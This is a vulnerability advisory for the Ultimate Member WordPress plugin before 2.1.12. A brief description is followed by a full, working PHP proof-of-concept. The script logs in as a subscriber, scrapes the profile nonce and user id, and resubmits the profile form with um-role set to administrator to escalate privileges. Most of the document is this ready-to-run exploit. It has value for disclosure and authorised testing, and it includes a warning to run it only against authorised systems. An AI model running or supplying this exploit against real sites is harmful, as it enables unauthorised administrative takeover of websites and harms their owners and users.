
Ultimate Member < 2.1.12 - Authenticated Privilege Escalation via Profile Update

2020-11-09 00:00:00
Chloe Chamberland

Ultimate Member lets site administrators define additional (secondary) roles, and to support that the plugin also accepted a `um-role` field on the `/wp-admin/profile.php` update form and applied it to the user being updated. Before 2.1.12 that field was apparently not restricted to users who may manage roles: any authenticated user who can reach the profile page (a subscriber is enough) could re-submit their own profile update with `um-role=administrator` and grant themselves an administrator role, as the proof-of-concept below demonstrates. The issue is fixed in 2.1.12.

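<?php

declare(strict_types=1);

/*
 * Proof of concept for WPEX-ID:DD4C4ECE-7206-4788-8747-F0C0F3AB0A53
 * (Ultimate Member < 2.1.12 - authenticated privilege escalation via profile update).
 *
 * Flow:
 *   1. log in to wp-login.php as a low-privilege user (the cookie jar keeps the session);
 *   2. fetch /wp-admin/profile.php once and scrape the update nonce and the user id;
 *   3. re-submit the profile form with the plugin's `um-role` field set to "administrator".
 *
 * Usage:
 *   php poc.php <wp_url> <username> <password> <first_name> <last_name> <nickname> <email>
 *
 * Only run this against systems you are authorised to test. The password is taken from
 * the command line, so it is visible to other local users through the process list.
 * TLS verification is left at curl's default (on); do not disable it to "make it work".
 */

/**
 * Performs one request with the shared cookie jar and returns the response body.
 *
 * @param string      $url       Absolute URL to request.
 * @param string      $cookieJar Path of the curl cookie jar shared by all requests.
 * @param array|null  $post      null for GET; an associative array is sent as an
 *                               application/x-www-form-urlencoded POST.
 *
 * @throws RuntimeException when curl reports a transport error.
 */
function wp_request(string $url, string $cookieJar, ?array $post = null): string
{
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL            => $url,
        CURLOPT_COOKIEJAR      => $cookieJar,
        CURLOPT_COOKIEFILE     => $cookieJar,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
    ]);
    if ($post !== null) {
        curl_setopt($ch, CURLOPT_POST, true);
        // Encode exactly once here; the field values below are plain text, not pre-encoded.
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post));
    }

    $body = curl_exec($ch);
    if ($body === false) {
        $error = curl_error($ch);
        curl_close($ch);
        throw new RuntimeException("Request to {$url} failed: {$error}");
    }
    curl_close($ch);

    return (string) $body;
}

/**
 * Returns the first capture group of $pattern in $html.
 *
 * @throws RuntimeException when the pattern does not match (typically: login failed,
 *                          the user has no wp-admin access, or the page layout differs).
 */
function scrape(string $pattern, string $html, string $what): string
{
    if (preg_match($pattern, $html, $matches) !== 1) {
        throw new RuntimeException(
            "Could not find {$what} in /wp-admin/profile.php - login failed or the page layout differs"
        );
    }

    return $matches[1];
}

// Settings
if (count($argv) < 8) {
    fwrite(STDERR, "Usage: php {$argv[0]} <wp_url> <username> <password> <first_name> <last_name> <nickname> <email>\n");
    exit(1);
}

[, $wp_url, $wp_user, $wp_pass, $name, $lastname, $nickname, $email] = $argv;
// Tolerate a trailing slash on the base URL so "/wp-login.php" is not doubled up.
$wp_url = rtrim($wp_url, '/');

$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
if ($cookiejar === false) {
    fwrite(STDERR, "Could not create a cookie jar in " . sys_get_temp_dir() . "\n");
    exit(1);
}

try {
    // 1) Log in as subscriber (with wp-admin access). WordPress sets the auth cookies
    //    on the handle, and curl persists them to the jar when the handle is closed.
    wp_request($wp_url . '/wp-login.php', $cookiejar, [
        'log'        => $wp_user,
        'pwd'        => $wp_pass,
        'rememberme' => 'forever',
        'wp-submit'  => 'Log In',
    ]);

    // 2) One fetch of the profile page is enough for both the nonce and the user id.
    $profile = wp_request($wp_url . '/wp-admin/profile.php', $cookiejar);
    // NOTE(review): takes the first _wpnonce on the page and assumes it is the
    // update-user nonce - confirm against the target's WordPress version.
    $nonce   = scrape('/_wpnonce"\svalue="([^"]+)"/', $profile, 'the _wpnonce field');
    $user_id = scrape('/"checkuser_id"\svalue="([^"]+)"/', $profile, 'the checkuser_id field');

    // 3) Update Settings: resubmit the profile form with um-role=administrator.
    //    The hidden field is posted back under the same name it was scraped from
    //    ("checkuser_id"); the original script sent it as "check_userid".
    $output = wp_request($wp_url . '/wp-admin/profile.php', $cookiejar, [
        '_wpnonce'         => $nonce,
        '_wp_http_referer' => '/wp-admin/profile.php',
        'from'             => 'profile',
        'checkuser_id'     => $user_id,
        'admin_bar_front'  => '1',
        'first_name'       => $name,
        'last_name'        => $lastname,
        'nickname'         => $nickname,
        'email'            => $email,
        'url'              => '',
        'description'      => '',
        'pass1'            => '',
        'pass2'            => '',
        'um-role'          => 'administrator',
        'action'           => 'update',
        'user_id'          => $user_id,
        'submit'           => 'Update Profile',
    ]);

    print_r($output);
} finally {
    // The jar contains live session cookies for the target; do not leave it in the temp dir.
    if (is_file($cookiejar)) {
        unlink($cookiejar);
    }
}

?>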
